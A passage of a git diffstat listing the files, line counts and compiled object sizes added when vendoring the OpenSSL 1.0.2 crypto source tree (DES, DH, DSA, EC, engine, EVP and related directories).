 .../openssl-1.0.2/crypto/conf/keysets.pl      |   185 +
 .../openssl-1.0.2/crypto/conf/lib             |     0
 .../openssl-1.0.2/crypto/conf/ssleay.cnf      |    78 +
 .../openssl-1.0.2/crypto/conf/test.c          |    97 +
 .../openssl-1.0.2/crypto/constant_time_locl.h |   211 +
 .../openssl-1.0.2/crypto/constant_time_test.c |   304 +
 .../openssl-1.0.2/crypto/cpt_err.c            |   104 +
 .../openssl-1.0.2/crypto/cpt_err.o            |   Bin 0 -> 1368 bytes
 .../openssl-1.0.2/crypto/cryptlib.c           |  1016 ++
 .../openssl-1.0.2/crypto/cryptlib.h           |   111 +
 .../openssl-1.0.2/crypto/cryptlib.o           |   Bin 0 -> 12616 bytes
 .../openssl-1.0.2/crypto/crypto-lib.com       |  1537 +++
 .../openssl-1.0.2/crypto/crypto.h             |   661 +
 .../openssl-1.0.2/crypto/cversion.c           |   107 +
 .../openssl-1.0.2/crypto/cversion.o           |   Bin 0 -> 2408 bytes
 .../openssl-1.0.2/crypto/des/COPYRIGHT        |    50 +
 .../openssl-1.0.2/crypto/des/DES.pm           |    19 +
 .../openssl-1.0.2/crypto/des/DES.xs           |   268 +
 .../openssl-1.0.2/crypto/des/FILES0           |    96 +
 .../openssl-1.0.2/crypto/des/INSTALL          |    69 +
 .../openssl-1.0.2/crypto/des/Imakefile        |    35 +
 .../openssl-1.0.2/crypto/des/KERBEROS         |    41 +
 .../openssl-1.0.2/crypto/des/Makefile         |   281 +
 .../openssl-1.0.2/crypto/des/Makefile.bak     |   281 +
 .../openssl-1.0.2/crypto/des/Makefile.save    |   281 +
 .../openssl-1.0.2/crypto/des/README           |    54 +
 .../openssl-1.0.2/crypto/des/VERSION          |   412 +
 .../openssl-1.0.2/crypto/des/asm/crypt586.pl  |   209 +
 .../openssl-1.0.2/crypto/des/asm/des-586.pl   |   455 +
 .../openssl-1.0.2/crypto/des/asm/des_enc.m4   |  2101 +++
 .../openssl-1.0.2/crypto/des/asm/desboth.pl   |    79 +
 .../crypto/des/asm/dest4-sparcv9.pl           |   617 +
 .../openssl-1.0.2/crypto/des/asm/readme       |   131 +
 .../openssl-1.0.2/crypto/des/cbc3_enc.c       |    95 +
 .../openssl-1.0.2/crypto/des/cbc_cksm.c       |   103 +
 .../openssl-1.0.2/crypto/des/cbc_cksm.o       |   Bin 0 -> 2320 bytes
 .../openssl-1.0.2/crypto/des/cbc_enc.c        |    61 +
 .../openssl-1.0.2/crypto/des/cbc_enc.o        |   Bin 0 -> 3216 bytes
 .../openssl-1.0.2/crypto/des/cfb64ede.c       |   249 +
 .../openssl-1.0.2/crypto/des/cfb64ede.o       |   Bin 0 -> 4728 bytes
 .../openssl-1.0.2/crypto/des/cfb64enc.c       |   122 +
 .../openssl-1.0.2/crypto/des/cfb64enc.o       |   Bin 0 -> 1960 bytes
 .../openssl-1.0.2/crypto/des/cfb_enc.c        |   199 +
 .../openssl-1.0.2/crypto/des/cfb_enc.o        |   Bin 0 -> 3880 bytes
 .../openssl-1.0.2/crypto/des/des-lib.com      |  1005 ++
 .../openssl-1.0.2/crypto/des/des.c            |   866 ++
 .../openssl-1.0.2/crypto/des/des.h            |   257 +
 .../openssl-1.0.2/crypto/des/des.pod          |   217 +
 .../openssl-1.0.2/crypto/des/des3s.cpp        |    67 +
 .../openssl-1.0.2/crypto/des/des_enc.c        |   389 +
 .../openssl-1.0.2/crypto/des/des_enc.o        |   Bin 0 -> 18272 bytes
 .../openssl-1.0.2/crypto/des/des_locl.h       |   443 +
 .../openssl-1.0.2/crypto/des/des_old.c        |   345 +
 .../openssl-1.0.2/crypto/des/des_old.h        |   497 +
 .../openssl-1.0.2/crypto/des/des_old.o        |   Bin 0 -> 7184 bytes
 .../openssl-1.0.2/crypto/des/des_old2.c       |    80 +
 .../openssl-1.0.2/crypto/des/des_old2.o       |   Bin 0 -> 1560 bytes
 .../openssl-1.0.2/crypto/des/des_opts.c       |   641 +
 .../openssl-1.0.2/crypto/des/des_ver.h        |    73 +
 .../openssl-1.0.2/crypto/des/dess.cpp         |    67 +
 .../openssl-1.0.2/crypto/des/destest.c        |   929 ++
 .../openssl-1.0.2/crypto/des/ecb3_enc.c       |    82 +
 .../openssl-1.0.2/crypto/des/ecb3_enc.o       |   Bin 0 -> 1768 bytes
 .../openssl-1.0.2/crypto/des/ecb_enc.c        |   124 +
 .../openssl-1.0.2/crypto/des/ecb_enc.o        |   Bin 0 -> 2864 bytes
 .../openssl-1.0.2/crypto/des/ede_cbcm_enc.c   |   189 +
 .../openssl-1.0.2/crypto/des/ede_cbcm_enc.o   |   Bin 0 -> 3352 bytes
 .../openssl-1.0.2/crypto/des/enc_read.c       |   235 +
 .../openssl-1.0.2/crypto/des/enc_read.o       |   Bin 0 -> 3776 bytes
 .../openssl-1.0.2/crypto/des/enc_writ.c       |   177 +
 .../openssl-1.0.2/crypto/des/enc_writ.o       |   Bin 0 -> 2920 bytes
 .../openssl-1.0.2/crypto/des/fcrypt.c         |   167 +
 .../openssl-1.0.2/crypto/des/fcrypt.o         |   Bin 0 -> 2592 bytes
 .../openssl-1.0.2/crypto/des/fcrypt_b.c       |   140 +
 .../openssl-1.0.2/crypto/des/fcrypt_b.o       |   Bin 0 -> 5072 bytes
 .../openssl-1.0.2/crypto/des/lib              |     0
 .../openssl-1.0.2/crypto/des/makefile.bc      |    50 +
 .../openssl-1.0.2/crypto/des/ncbc_enc.c       |   154 +
 .../openssl-1.0.2/crypto/des/ofb64ede.c       |   123 +
 .../openssl-1.0.2/crypto/des/ofb64ede.o       |   Bin 0 -> 1928 bytes
 .../openssl-1.0.2/crypto/des/ofb64enc.c       |   109 +
 .../openssl-1.0.2/crypto/des/ofb64enc.o       |   Bin 0 -> 1888 bytes
 .../openssl-1.0.2/crypto/des/ofb_enc.c        |   131 +
 .../openssl-1.0.2/crypto/des/ofb_enc.o        |   Bin 0 -> 3016 bytes
 .../openssl-1.0.2/crypto/des/options.txt      |    39 +
 .../openssl-1.0.2/crypto/des/pcbc_enc.c       |   115 +
 .../openssl-1.0.2/crypto/des/pcbc_enc.o       |   Bin 0 -> 2832 bytes
 .../openssl-1.0.2/crypto/des/qud_cksm.c       |   143 +
 .../openssl-1.0.2/crypto/des/qud_cksm.o       |   Bin 0 -> 1560 bytes
 .../openssl-1.0.2/crypto/des/rand_key.c       |    67 +
 .../openssl-1.0.2/crypto/des/rand_key.o       |   Bin 0 -> 1744 bytes
 .../openssl-1.0.2/crypto/des/read2pwd.c       |   140 +
 .../openssl-1.0.2/crypto/des/read2pwd.o       |   Bin 0 -> 2424 bytes
 .../openssl-1.0.2/crypto/des/read_pwd.c       |   533 +
 .../openssl-1.0.2/crypto/des/rpc_des.h        |   130 +
 .../openssl-1.0.2/crypto/des/rpc_enc.c        |   100 +
 .../openssl-1.0.2/crypto/des/rpc_enc.o        |   Bin 0 -> 1920 bytes
 .../openssl-1.0.2/crypto/des/rpw.c            |    94 +
 .../openssl-1.0.2/crypto/des/set_key.c        |   447 +
 .../openssl-1.0.2/crypto/des/set_key.o        |   Bin 0 -> 5888 bytes
 .../openssl-1.0.2/crypto/des/speed.c          |   299 +
 .../openssl-1.0.2/crypto/des/spr.h            |   237 +
 .../openssl-1.0.2/crypto/des/str2key.c        |   164 +
 .../openssl-1.0.2/crypto/des/str2key.o        |   Bin 0 -> 2840 bytes
 .../openssl-1.0.2/crypto/des/t/test           |    27 +
 .../openssl-1.0.2/crypto/des/times/486-50.sol |    16 +
 .../crypto/des/times/586-100.lnx              |    20 +
 .../crypto/des/times/686-200.fre              |    18 +
 .../openssl-1.0.2/crypto/des/times/aix.cc     |    26 +
 .../openssl-1.0.2/crypto/des/times/alpha.cc   |    18 +
 .../openssl-1.0.2/crypto/des/times/hpux.cc    |    17 +
 .../openssl-1.0.2/crypto/des/times/sparc.gcc  |    17 +
 .../openssl-1.0.2/crypto/des/times/usparc.cc  |    31 +
 .../openssl-1.0.2/crypto/des/typemap          |    34 +
 .../openssl-1.0.2/crypto/des/xcbc_enc.c       |   216 +
 .../openssl-1.0.2/crypto/des/xcbc_enc.o       |   Bin 0 -> 3504 bytes
 .../openssl-1.0.2/crypto/dh/Makefile          |   191 +
 .../openssl-1.0.2/crypto/dh/Makefile.bak      |   191 +
 .../openssl-1.0.2/crypto/dh/Makefile.save     |   191 +
 .../openssl-1.0.2/crypto/dh/dh.h              |   392 +
 .../openssl-1.0.2/crypto/dh/dh1024.pem        |     5 +
 .../openssl-1.0.2/crypto/dh/dh192.pem         |     3 +
 .../openssl-1.0.2/crypto/dh/dh2048.pem        |    16 +
 .../openssl-1.0.2/crypto/dh/dh4096.pem        |    14 +
 .../openssl-1.0.2/crypto/dh/dh512.pem         |     4 +
 .../openssl-1.0.2/crypto/dh/dh_ameth.c        |   953 ++
 .../openssl-1.0.2/crypto/dh/dh_ameth.o        |   Bin 0 -> 19288 bytes
 .../openssl-1.0.2/crypto/dh/dh_asn1.c         |   189 +
 .../openssl-1.0.2/crypto/dh/dh_asn1.o         |   Bin 0 -> 5520 bytes
 .../openssl-1.0.2/crypto/dh/dh_check.c        |   173 +
 .../openssl-1.0.2/crypto/dh/dh_check.o        |   Bin 0 -> 3456 bytes
 .../openssl-1.0.2/crypto/dh/dh_depr.c         |    82 +
 .../openssl-1.0.2/crypto/dh/dh_depr.o         |   Bin 0 -> 1912 bytes
 .../openssl-1.0.2/crypto/dh/dh_err.c          |   126 +
 .../openssl-1.0.2/crypto/dh/dh_err.o          |   Bin 0 -> 1360 bytes
 .../openssl-1.0.2/crypto/dh/dh_gen.c          |   204 +
 .../openssl-1.0.2/crypto/dh/dh_gen.o          |   Bin 0 -> 2792 bytes
 .../openssl-1.0.2/crypto/dh/dh_kdf.c          |   187 +
 .../openssl-1.0.2/crypto/dh/dh_kdf.o          |   Bin 0 -> 3448 bytes
 .../openssl-1.0.2/crypto/dh/dh_key.c          |   289 +
 .../openssl-1.0.2/crypto/dh/dh_key.o          |   Bin 0 -> 5464 bytes
 .../openssl-1.0.2/crypto/dh/dh_lib.c          |   263 +
 .../openssl-1.0.2/crypto/dh/dh_lib.o          |   Bin 0 -> 4744 bytes
 .../openssl-1.0.2/crypto/dh/dh_pmeth.c        |   548 +
 .../openssl-1.0.2/crypto/dh/dh_pmeth.o        |   Bin 0 -> 9016 bytes
 .../openssl-1.0.2/crypto/dh/dh_prn.c          |    79 +
 .../openssl-1.0.2/crypto/dh/dh_prn.o          |   Bin 0 -> 1968 bytes
 .../openssl-1.0.2/crypto/dh/dh_rfc5114.c      |   285 +
 .../openssl-1.0.2/crypto/dh/dh_rfc5114.o      |   Bin 0 -> 5632 bytes
 .../openssl-1.0.2/crypto/dh/dhtest.c          |   564 +
 .../openssl-1.0.2/crypto/dh/example           |    50 +
 .../openssl-1.0.2/crypto/dh/generate          |    65 +
 .../openssl-1.0.2/crypto/dh/lib               |     0
 .../openssl-1.0.2/crypto/dh/p1024.c           |    92 +
 .../openssl-1.0.2/crypto/dh/p192.c            |    80 +
 .../openssl-1.0.2/crypto/dh/p512.c            |    85 +
 .../openssl-1.0.2/crypto/dsa/Makefile         |   199 +
 .../openssl-1.0.2/crypto/dsa/Makefile.bak     |   199 +
 .../openssl-1.0.2/crypto/dsa/Makefile.save    |   199 +
 .../openssl-1.0.2/crypto/dsa/README           |     4 +
 .../openssl-1.0.2/crypto/dsa/dsa.h            |   332 +
 .../openssl-1.0.2/crypto/dsa/dsa_ameth.c      |   675 +
 .../openssl-1.0.2/crypto/dsa/dsa_ameth.o      |   Bin 0 -> 14928 bytes
 .../openssl-1.0.2/crypto/dsa/dsa_asn1.c       |   202 +
 .../openssl-1.0.2/crypto/dsa/dsa_asn1.o       |   Bin 0 -> 8448 bytes
 .../openssl-1.0.2/crypto/dsa/dsa_depr.c       |   113 +
 .../openssl-1.0.2/crypto/dsa/dsa_depr.o       |   Bin 0 -> 1984 bytes
 .../openssl-1.0.2/crypto/dsa/dsa_err.c        |   133 +
 .../openssl-1.0.2/crypto/dsa/dsa_err.o        |   Bin 0 -> 1360 bytes
 .../openssl-1.0.2/crypto/dsa/dsa_gen.c        |   754 ++
 .../openssl-1.0.2/crypto/dsa/dsa_gen.o        |   Bin 0 -> 12320 bytes
 .../openssl-1.0.2/crypto/dsa/dsa_key.c        |   145 +
 .../openssl-1.0.2/crypto/dsa/dsa_key.o        |   Bin 0 -> 2400 bytes
 .../openssl-1.0.2/crypto/dsa/dsa_lib.c        |   329 +
 .../openssl-1.0.2/crypto/dsa/dsa_lib.o        |   Bin 0 -> 5560 bytes
 .../openssl-1.0.2/crypto/dsa/dsa_locl.h       |    69 +
 .../openssl-1.0.2/crypto/dsa/dsa_ossl.c       |   422 +
 .../openssl-1.0.2/crypto/dsa/dsa_ossl.o       |   Bin 0 -> 7336 bytes
 .../openssl-1.0.2/crypto/dsa/dsa_pmeth.c      |   312 +
 .../openssl-1.0.2/crypto/dsa/dsa_pmeth.o      |   Bin 0 -> 6864 bytes
 .../openssl-1.0.2/crypto/dsa/dsa_prn.c        |   119 +
 .../openssl-1.0.2/crypto/dsa/dsa_prn.o        |   Bin 0 -> 3120 bytes
 .../openssl-1.0.2/crypto/dsa/dsa_sign.c       |   110 +
 .../openssl-1.0.2/crypto/dsa/dsa_sign.o       |   Bin 0 -> 2216 bytes
 .../openssl-1.0.2/crypto/dsa/dsa_vrf.c        |    75 +
 .../openssl-1.0.2/crypto/dsa/dsa_vrf.o        |   Bin 0 -> 1368 bytes
 .../openssl-1.0.2/crypto/dsa/dsagen.c         |   115 +
 .../openssl-1.0.2/crypto/dsa/dsatest.c        |   268 +
 .../openssl-1.0.2/crypto/dsa/fips186a.txt     |   122 +
 .../openssl-1.0.2/crypto/dsa/lib              |     0
 .../openssl-1.0.2/crypto/dso/Makefile         |   150 +
 .../openssl-1.0.2/crypto/dso/Makefile.bak     |   150 +
 .../openssl-1.0.2/crypto/dso/Makefile.save    |   150 +
 .../openssl-1.0.2/crypto/dso/README           |    22 +
 .../openssl-1.0.2/crypto/dso/dso.h            |   451 +
 .../openssl-1.0.2/crypto/dso/dso_beos.c       |   253 +
 .../openssl-1.0.2/crypto/dso/dso_beos.o       |   Bin 0 -> 1368 bytes
 .../openssl-1.0.2/crypto/dso/dso_dl.c         |   380 +
 .../openssl-1.0.2/crypto/dso/dso_dl.o         |   Bin 0 -> 1360 bytes
 .../openssl-1.0.2/crypto/dso/dso_dlfcn.c      |   466 +
 .../openssl-1.0.2/crypto/dso/dso_dlfcn.o      |   Bin 0 -> 1368 bytes
 .../openssl-1.0.2/crypto/dso/dso_err.c        |   158 +
 .../openssl-1.0.2/crypto/dso/dso_err.o        |   Bin 0 -> 1360 bytes
 .../openssl-1.0.2/crypto/dso/dso_lib.c        |   447 +
 .../openssl-1.0.2/crypto/dso/dso_lib.o        |   Bin 0 -> 7248 bytes
 .../openssl-1.0.2/crypto/dso/dso_null.c       |    92 +
 .../openssl-1.0.2/crypto/dso/dso_null.o       |   Bin 0 -> 1952 bytes
 .../openssl-1.0.2/crypto/dso/dso_openssl.c    |    83 +
 .../openssl-1.0.2/crypto/dso/dso_openssl.o    |   Bin 0 -> 1552 bytes
 .../openssl-1.0.2/crypto/dso/dso_vms.c        |   532 +
 .../openssl-1.0.2/crypto/dso/dso_vms.o        |   Bin 0 -> 1368 bytes
 .../openssl-1.0.2/crypto/dso/dso_win32.c      |   788 ++
 .../openssl-1.0.2/crypto/dso/dso_win32.o      |   Bin 0 -> 1368 bytes
 .../openssl-1.0.2/crypto/dso/lib              |     0
 .../openssl-1.0.2/crypto/ebcdic.c             |   284 +
 .../openssl-1.0.2/crypto/ebcdic.h             |    26 +
 .../openssl-1.0.2/crypto/ebcdic.o             |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/crypto/ec/Makefile          |   271 +
 .../openssl-1.0.2/crypto/ec/Makefile.save     |   271 +
 .../crypto/ec/asm/ecp_nistz256-avx2.pl        |  2093 +++
 .../crypto/ec/asm/ecp_nistz256-x86_64.pl      |  2993 +++++
 .../openssl-1.0.2/crypto/ec/ec.h              |  1281 ++
 .../openssl-1.0.2/crypto/ec/ec2_mult.c        |   463 +
 .../openssl-1.0.2/crypto/ec/ec2_oct.c         |   403 +
 .../openssl-1.0.2/crypto/ec/ec2_smpl.c        |   797 ++
 .../openssl-1.0.2/crypto/ec/ec_ameth.c        |   965 ++
 .../openssl-1.0.2/crypto/ec/ec_asn1.c         |  1311 ++
 .../openssl-1.0.2/crypto/ec/ec_check.c        |   120 +
 .../openssl-1.0.2/crypto/ec/ec_curve.c        |  3248 +++++
 .../openssl-1.0.2/crypto/ec/ec_cvt.c          |   180 +
 .../openssl-1.0.2/crypto/ec/ec_err.c          |   331 +
 .../openssl-1.0.2/crypto/ec/ec_key.c          |   559 +
 .../openssl-1.0.2/crypto/ec/ec_lcl.h          |   576 +
 .../openssl-1.0.2/crypto/ec/ec_lib.c          |  1127 ++
 .../openssl-1.0.2/crypto/ec/ec_mult.c         |   913 ++
 .../openssl-1.0.2/crypto/ec/ec_oct.c          |   192 +
 .../openssl-1.0.2/crypto/ec/ec_pmeth.c        |   530 +
 .../openssl-1.0.2/crypto/ec/ec_print.c        |   179 +
 .../openssl-1.0.2/crypto/ec/eck_prn.c         |   375 +
 .../openssl-1.0.2/crypto/ec/ecp_mont.c        |   308 +
 .../openssl-1.0.2/crypto/ec/ecp_nist.c        |   220 +
 .../openssl-1.0.2/crypto/ec/ecp_nistp224.c    |  1769 +++
 .../openssl-1.0.2/crypto/ec/ecp_nistp256.c    |  2369 ++++
 .../openssl-1.0.2/crypto/ec/ecp_nistp521.c    |  2148 +++
 .../openssl-1.0.2/crypto/ec/ecp_nistputil.c   |   218 +
 .../crypto/ec/ecp_nistz256-x86_64.s           |  3504 +++++
 .../openssl-1.0.2/crypto/ec/ecp_nistz256.c    |  1486 +++
 .../crypto/ec/ecp_nistz256_table.c            |  9533 ++++++++++++++
 .../openssl-1.0.2/crypto/ec/ecp_oct.c         |   428 +
 .../openssl-1.0.2/crypto/ec/ecp_smpl.c        |  1418 ++
 .../openssl-1.0.2/crypto/ec/ectest.c          |  1861 +++
 .../openssl-1.0.2/crypto/ecdh/Makefile        |   119 +
 .../openssl-1.0.2/crypto/ecdh/Makefile.save   |   119 +
 .../openssl-1.0.2/crypto/ecdh/ecdh.h          |   134 +
 .../openssl-1.0.2/crypto/ecdh/ecdhtest.c      |   580 +
 .../openssl-1.0.2/crypto/ecdh/ech_err.c       |    98 +
 .../openssl-1.0.2/crypto/ecdh/ech_kdf.c       |   111 +
 .../openssl-1.0.2/crypto/ecdh/ech_key.c       |    81 +
 .../openssl-1.0.2/crypto/ecdh/ech_lib.c       |   265 +
 .../openssl-1.0.2/crypto/ecdh/ech_locl.h      |   104 +
 .../openssl-1.0.2/crypto/ecdh/ech_ossl.c      |   218 +
 .../openssl-1.0.2/crypto/ecdsa/Makefile       |   125 +
 .../openssl-1.0.2/crypto/ecdsa/Makefile.save  |   125 +
 .../openssl-1.0.2/crypto/ecdsa/ecdsa.h        |   335 +
 .../openssl-1.0.2/crypto/ecdsa/ecdsatest.c    |   556 +
 .../openssl-1.0.2/crypto/ecdsa/ecs_asn1.c     |    67 +
 .../openssl-1.0.2/crypto/ecdsa/ecs_err.c      |   107 +
 .../openssl-1.0.2/crypto/ecdsa/ecs_lib.c      |   354 +
 .../openssl-1.0.2/crypto/ecdsa/ecs_locl.h     |   120 +
 .../openssl-1.0.2/crypto/ecdsa/ecs_ossl.c     |   464 +
 .../openssl-1.0.2/crypto/ecdsa/ecs_sign.c     |   106 +
 .../openssl-1.0.2/crypto/ecdsa/ecs_vrf.c      |   112 +
 .../openssl-1.0.2/crypto/engine/Makefile      |   433 +
 .../openssl-1.0.2/crypto/engine/Makefile.save |   433 +
 .../openssl-1.0.2/crypto/engine/README        |   211 +
 .../openssl-1.0.2/crypto/engine/eng_all.c     |   136 +
 .../openssl-1.0.2/crypto/engine/eng_cnf.c     |   242 +
 .../crypto/engine/eng_cryptodev.c             |  1532 +++
 .../openssl-1.0.2/crypto/engine/eng_ctrl.c    |   385 +
 .../openssl-1.0.2/crypto/engine/eng_dyn.c     |   568 +
 .../openssl-1.0.2/crypto/engine/eng_err.c     |   181 +
 .../openssl-1.0.2/crypto/engine/eng_fat.c     |   179 +
 .../openssl-1.0.2/crypto/engine/eng_init.c    |   157 +
 .../openssl-1.0.2/crypto/engine/eng_int.h     |   224 +
 .../openssl-1.0.2/crypto/engine/eng_lib.c     |   347 +
 .../openssl-1.0.2/crypto/engine/eng_list.c    |   404 +
 .../openssl-1.0.2/crypto/engine/eng_openssl.c |   402 +
 .../openssl-1.0.2/crypto/engine/eng_pkey.c    |   186 +
 .../openssl-1.0.2/crypto/engine/eng_rdrand.c  |   149 +
 .../openssl-1.0.2/crypto/engine/eng_rsax.c    |   701 +
 .../openssl-1.0.2/crypto/engine/eng_table.c   |   358 +
 .../openssl-1.0.2/crypto/engine/engine.h      |   960 ++
 .../openssl-1.0.2/crypto/engine/enginetest.c  |   269 +
 .../openssl-1.0.2/crypto/engine/tb_asnmth.c   |   246 +
 .../openssl-1.0.2/crypto/engine/tb_cipher.c   |   143 +
 .../openssl-1.0.2/crypto/engine/tb_dh.c       |   124 +
 .../openssl-1.0.2/crypto/engine/tb_digest.c   |   143 +
 .../openssl-1.0.2/crypto/engine/tb_dsa.c      |   124 +
 .../openssl-1.0.2/crypto/engine/tb_ecdh.c     |   139 +
 .../openssl-1.0.2/crypto/engine/tb_ecdsa.c    |   124 +
 .../openssl-1.0.2/crypto/engine/tb_pkmeth.c   |   166 +
 .../openssl-1.0.2/crypto/engine/tb_rand.c     |   124 +
 .../openssl-1.0.2/crypto/engine/tb_rsa.c      |   124 +
 .../openssl-1.0.2/crypto/engine/tb_store.c    |   129 +
 .../openssl-1.0.2/crypto/err/Makefile         |   108 +
 .../openssl-1.0.2/crypto/err/Makefile.bak     |   108 +
 .../openssl-1.0.2/crypto/err/Makefile.save    |   108 +
 .../openssl-1.0.2/crypto/err/err.c            |  1145 ++
 .../openssl-1.0.2/crypto/err/err.h            |   389 +
 .../openssl-1.0.2/crypto/err/err.o            |   Bin 0 -> 18120 bytes
 .../openssl-1.0.2/crypto/err/err_all.c        |   168 +
 .../openssl-1.0.2/crypto/err/err_all.o        |   Bin 0 -> 1368 bytes
 .../openssl-1.0.2/crypto/err/err_prn.c        |   113 +
 .../openssl-1.0.2/crypto/err/err_prn.o        |   Bin 0 -> 3376 bytes
 .../openssl-1.0.2/crypto/err/lib              |     0
 .../openssl-1.0.2/crypto/err/openssl.ec       |    98 +
 .../openssl-1.0.2/crypto/evp/Makefile         |   736 ++
 .../openssl-1.0.2/crypto/evp/Makefile.bak     |   736 ++
 .../openssl-1.0.2/crypto/evp/Makefile.save    |   736 ++
 .../openssl-1.0.2/crypto/evp/bio_b64.c        |   573 +
 .../openssl-1.0.2/crypto/evp/bio_b64.o        |   Bin 0 -> 9824 bytes
 .../openssl-1.0.2/crypto/evp/bio_enc.c        |   428 +
 .../openssl-1.0.2/crypto/evp/bio_enc.o        |   Bin 0 -> 6424 bytes
 .../openssl-1.0.2/crypto/evp/bio_md.c         |   272 +
 .../openssl-1.0.2/crypto/evp/bio_md.o         |   Bin 0 -> 4608 bytes
 .../openssl-1.0.2/crypto/evp/bio_ok.c         |   623 +
 .../openssl-1.0.2/crypto/evp/bio_ok.o         |   Bin 0 -> 7664 bytes
 .../openssl-1.0.2/crypto/evp/c_all.c          |    90 +
 .../openssl-1.0.2/crypto/evp/c_all.o          |   Bin 0 -> 1720 bytes
 .../openssl-1.0.2/crypto/evp/c_allc.c         |   241 +
 .../openssl-1.0.2/crypto/evp/c_allc.o         |   Bin 0 -> 15544 bytes
 .../openssl-1.0.2/crypto/evp/c_alld.c         |   114 +
 .../openssl-1.0.2/crypto/evp/c_alld.o         |   Bin 0 -> 4304 bytes
 .../openssl-1.0.2/crypto/evp/digest.c         |   403 +
 .../openssl-1.0.2/crypto/evp/digest.o         |   Bin 0 -> 5376 bytes
 .../openssl-1.0.2/crypto/evp/e_aes.c          |  2021 +++
 .../openssl-1.0.2/crypto/evp/e_aes.o          |   Bin 0 -> 22576 bytes
 .../crypto/evp/e_aes_cbc_hmac_sha1.c          |  1002 ++
 .../crypto/evp/e_aes_cbc_hmac_sha1.o          |   Bin 0 -> 1488 bytes
 .../crypto/evp/e_aes_cbc_hmac_sha256.c        |   970 ++
 .../crypto/evp/e_aes_cbc_hmac_sha256.o        |   Bin 0 -> 1496 bytes
 .../openssl-1.0.2/crypto/evp/e_bf.c           |    87 +
 .../openssl-1.0.2/crypto/evp/e_bf.o           |   Bin 0 -> 4680 bytes
 .../openssl-1.0.2/crypto/evp/e_camellia.c     |   394 +
 .../openssl-1.0.2/crypto/evp/e_camellia.o     |   Bin 0 -> 9192 bytes
 .../openssl-1.0.2/crypto/evp/e_cast.c         |    89 +
 .../openssl-1.0.2/crypto/evp/e_cast.o         |   Bin 0 -> 4720 bytes
 .../openssl-1.0.2/crypto/evp/e_des.c          |   268 +
 .../openssl-1.0.2/crypto/evp/e_des.o          |   Bin 0 -> 6808 bytes
 .../openssl-1.0.2/crypto/evp/e_des3.c         |   493 +
 .../openssl-1.0.2/crypto/evp/e_des3.o         |   Bin 0 -> 10280 bytes
 .../openssl-1.0.2/crypto/evp/e_dsa.c          |    69 +
 .../openssl-1.0.2/crypto/evp/e_idea.c         |   119 +
 .../openssl-1.0.2/crypto/evp/e_idea.o         |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/crypto/evp/e_null.c         |   100 +
 .../openssl-1.0.2/crypto/evp/e_null.o         |   Bin 0 -> 2024 bytes
 .../openssl-1.0.2/crypto/evp/e_old.c          |   164 +
 .../openssl-1.0.2/crypto/evp/e_old.o          |   Bin 0 -> 2792 bytes
 .../openssl-1.0.2/crypto/evp/e_rc2.c          |   235 +
 .../openssl-1.0.2/crypto/evp/e_rc2.o          |   Bin 0 -> 7352 bytes
 .../openssl-1.0.2/crypto/evp/e_rc4.c          |   133 +
 .../openssl-1.0.2/crypto/evp/e_rc4.o          |   Bin 0 -> 2616 bytes
 .../openssl-1.0.2/crypto/evp/e_rc4_hmac_md5.c |   302 +
 .../openssl-1.0.2/crypto/evp/e_rc4_hmac_md5.o |   Bin 0 -> 4088 bytes
 .../openssl-1.0.2/crypto/evp/e_rc5.c          |   122 +
 .../openssl-1.0.2/crypto/evp/e_rc5.o          |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/crypto/evp/e_seed.c         |    82 +
 .../openssl-1.0.2/crypto/evp/e_seed.o         |   Bin 0 -> 4344 bytes
 .../openssl-1.0.2/crypto/evp/e_xcbc_d.c       |   130 +
 .../openssl-1.0.2/crypto/evp/e_xcbc_d.o       |   Bin 0 -> 2696 bytes
 .../openssl-1.0.2/crypto/evp/encode.c         |   452 +
 .../openssl-1.0.2/crypto/evp/encode.o         |   Bin 0 -> 4784 bytes
 .../openssl-1.0.2/crypto/evp/evp.h            |  1519 +++
 .../openssl-1.0.2/crypto/evp/evp_acnf.c       |    73 +
 .../openssl-1.0.2/crypto/evp/evp_acnf.o       |   Bin 0 -> 1656 bytes
 .../openssl-1.0.2/crypto/evp/evp_cnf.c        |   118 +
 .../openssl-1.0.2/crypto/evp/evp_cnf.o        |   Bin 0 -> 2984 bytes
 .../openssl-1.0.2/crypto/evp/evp_enc.c        |   666 +
 .../openssl-1.0.2/crypto/evp/evp_enc.o        |   Bin 0 -> 8752 bytes
 .../openssl-1.0.2/crypto/evp/evp_err.c        |   254 +
 .../openssl-1.0.2/crypto/evp/evp_err.o        |   Bin 0 -> 1360 bytes
 .../openssl-1.0.2/crypto/evp/evp_key.c        |   193 +
 .../openssl-1.0.2/crypto/evp/evp_key.o        |   Bin 0 -> 4544 bytes
 .../openssl-1.0.2/crypto/evp/evp_lib.c        |   367 +
 .../openssl-1.0.2/crypto/evp/evp_lib.o        |   Bin 0 -> 6352 bytes
 .../openssl-1.0.2/crypto/evp/evp_locl.h       |   373 +
 .../openssl-1.0.2/crypto/evp/evp_pbe.c        |   304 +
 .../openssl-1.0.2/crypto/evp/evp_pbe.o        |   Bin 0 -> 6304 bytes
 .../openssl-1.0.2/crypto/evp/evp_pkey.c       |   229 +
 .../openssl-1.0.2/crypto/evp/evp_pkey.o       |   Bin 0 -> 5040 bytes
 .../openssl-1.0.2/crypto/evp/evp_test.c       |   596 +
 .../openssl-1.0.2/crypto/evp/evptests.txt     |   401 +
 .../openssl-1.0.2/crypto/evp/lib              |     0
 .../openssl-1.0.2/crypto/evp/m_dss.c          |   104 +
 .../openssl-1.0.2/crypto/evp/m_dss.o          |   Bin 0 -> 2456 bytes
 .../openssl-1.0.2/crypto/evp/m_dss1.c         |   105 +
 .../openssl-1.0.2/crypto/evp/m_dss1.o         |   Bin 0 -> 2456 bytes
 .../openssl-1.0.2/crypto/evp/m_ecdsa.c        |   154 +
 .../openssl-1.0.2/crypto/evp/m_ecdsa.o        |   Bin 0 -> 2352 bytes
 .../openssl-1.0.2/crypto/evp/m_md2.c          |   106 +
 .../openssl-1.0.2/crypto/evp/m_md2.o          |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/crypto/evp/m_md4.c          |   108 +
 .../openssl-1.0.2/crypto/evp/m_md4.o          |   Bin 0 -> 2456 bytes
 .../openssl-1.0.2/crypto/evp/m_md5.c          |   107 +
 .../openssl-1.0.2/crypto/evp/m_md5.o          |   Bin 0 -> 2456 bytes
 .../openssl-1.0.2/crypto/evp/m_mdc2.c         |   108 +
 .../openssl-1.0.2/crypto/evp/m_mdc2.o         |   Bin 0 -> 2496 bytes
